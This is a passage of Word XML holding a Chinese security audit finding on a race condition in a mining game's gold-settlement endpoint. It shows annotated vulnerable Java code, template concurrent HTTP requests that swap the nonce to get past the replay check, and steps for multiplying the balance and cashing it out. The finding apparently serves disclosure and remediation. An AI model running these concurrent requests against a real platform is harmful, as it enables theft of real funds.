        <w:t xml:space="preserve">T1 持锁期间将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加入余额并在事务末尾写回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime = now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="199"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2 等待 T1 释放锁后，对已被 T1 更新过的余额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>再次加上同等 `goldToAdd`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="200"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T2 使用的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象在事务开始时读取（REPEATABLE READ 或 READ COMMITTED 均适用），此时 T1 尚未提交，故 T2 看到的仍是旧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，两笔金额完全等值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若并发 N 个请求，该时间窗口内本应只结算一次的金币可被放大为 N 倍。结合平台存在提现（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>withdrawManage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）能力，直接构成真实资金损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="20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POST /api/game/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.archive()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveService.saveArchiveNew()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew(userId, user, now)</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user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时无锁，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的写回在事务最末尾，两者之间的整段业务逻辑形成充足的竞态窗口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对余额行加锁的位置在金额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>计算之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，无法防止基于相同旧快照重复计算同等 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="20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：攻击者每次并发 N 个合法存档请求，可将该结算周期（最大 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resolveArchiveGoldMaxSeconds()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 秒）内累积的全部未结算金币放大为 N 倍；若 Gold 可通过提现兑换为真实货币，则对应 N-1 倍的平台直接资金损失。</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入口：ArchiveController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/archive")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; archive(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @CurrentUserId Long userId,           // ← userId 由 Token 解析，不可伪造</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody @Valid ArchiveSaveRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    archiveService.saveArchiveNew(userId, request);   // ← 触发存档结算逻辑</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 事务方法：ArchiveService.java#saveArchiveNew</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void saveArchiveNew(Long userId, ArchiveSaveRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userRepository.findById(userId)       // ← 普通 SELECT，无 FOR UPDATE</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    settleArchiveGoldNew(userId, user, now);           // ← user 快照已读，传入结算逻辑</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 大量后续逻辑（矿机校验、重排、算力重算）执行期间事务持续未提交</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 整个 rearrangeMinersNew + recalcUserLevelAndHashRate 执行期间</w:t>
              <w:br/>
              <w:t xml:space="preserve">    //   并发 T2 可以同时推进到 settleArchiveGoldNew 的 findByUserIdForUpdate 处等锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user.setLastArchiveTime(now);                     // ← lastArchiveTime 在此才被修改</w:t>
              <w:br/>
              <w:t xml:space="preserve">    user.setLastMiningAt(now);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.save(user);                        // ← 事务末尾才持久化，TOCTOU 窗口关闭</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ArchiveService.java#settleArchiveGoldNew</w:t>
              <w:br/>
              <w:t>private void settleArchiveGoldNew(Long userId, User user, LocalDateTime now) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime lastArchive = user.getLastArchiveTime();     // ← T1/T2 均读到相同旧时间戳</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal oldHashRate = user.getCurrentTotalHashRate() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ? user.getCurrentTotalHashRate() : BigDecimal.ZERO;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (lastArchive == null || oldHashRate.compareTo(BigDecimal.ZERO) &lt;= 0) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    long seconds = ChronoUnit.SECONDS.between(lastArchive, now);  // ← T1/T2 计算出相同 seconds</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (seconds &lt;= 0) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seconds = Math.min(seconds, resolveArchiveGoldMaxSeconds());</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal goldToAdd = oldHashRate.multiply(BigDecimal.valueOf(seconds)); // ← T1/T2 得出相同 goldToAdd</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.findByUserIdForUpdate(userId).ifPresent(account -&gt; { // ← 锁在计算之后，仅序列化写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal cur = account.getGoldBalance() != null ? account.getGoldBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setGoldBalance(cur.add(goldToAdd));  // ← T1 加一次；T2 等锁释放后对新余额再加一次</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 最终 balance = initial + N × goldToAdd（N = 并发请求数）</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使用同一账户同时发出 N 个（示例为 2 个）完全相同的合法存档请求：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/api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者账户有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce-1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;基于上述参数计算的合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "slots": [</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":1,"minerLevel":&lt;攻击者实际持有的矿机等级或null&gt;,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":2,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":3,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":4,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":5,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":6,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":7,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":8,"minerLevel":null,"charging":false},</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {"slotId":9,"minerLevel":null,"charging":false}</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ],</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "storage": [&lt;攻击者仓库中所有矿机的等级列表，与DB一致&gt;]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i w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第二个并发请求与第一个完全相同（更换 `nonce` 以通过防重放校验）：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/api/game/archive HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;相同Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce-2&gt;   ← 更换 nonce 绕过 nonce 唯一性校验</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;重新计算的合法签名&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>&lt;与上方完全相同的 JSON body&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用有效账户登录，获取 Bearer Token；使用官方客户端或已逆向得到的 </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appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 构造合法请求签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">记录当前账户的金币余额 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance_before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，等待足够长时间（使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与当前时间差接近 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resolveArchiveGoldMaxSeconds()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上限），以最大化单次结算 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">利用并发工具（如 Burp Suite Intruder 并发模式、Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio.gather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl --parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送 N 个上述请求，每个请求携带不同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 但相同的 Token 和矿机布局（布局内容必须与服务器库存完全一致，保证请求在矿机校验环节不被拦截）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="206"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">全部请求执行完毕后查询账户余额 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance_after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，预期 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance_after ≈ balance_before + N × goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（而正常情况应为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance_before + 1 × goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="207"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若平台支持提现，攻击者随即发起提现，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(N-1) × goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应的超额收益兑换为真实货币。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="20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（Bearer Token 鉴权 + 请求签名校验双重验证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
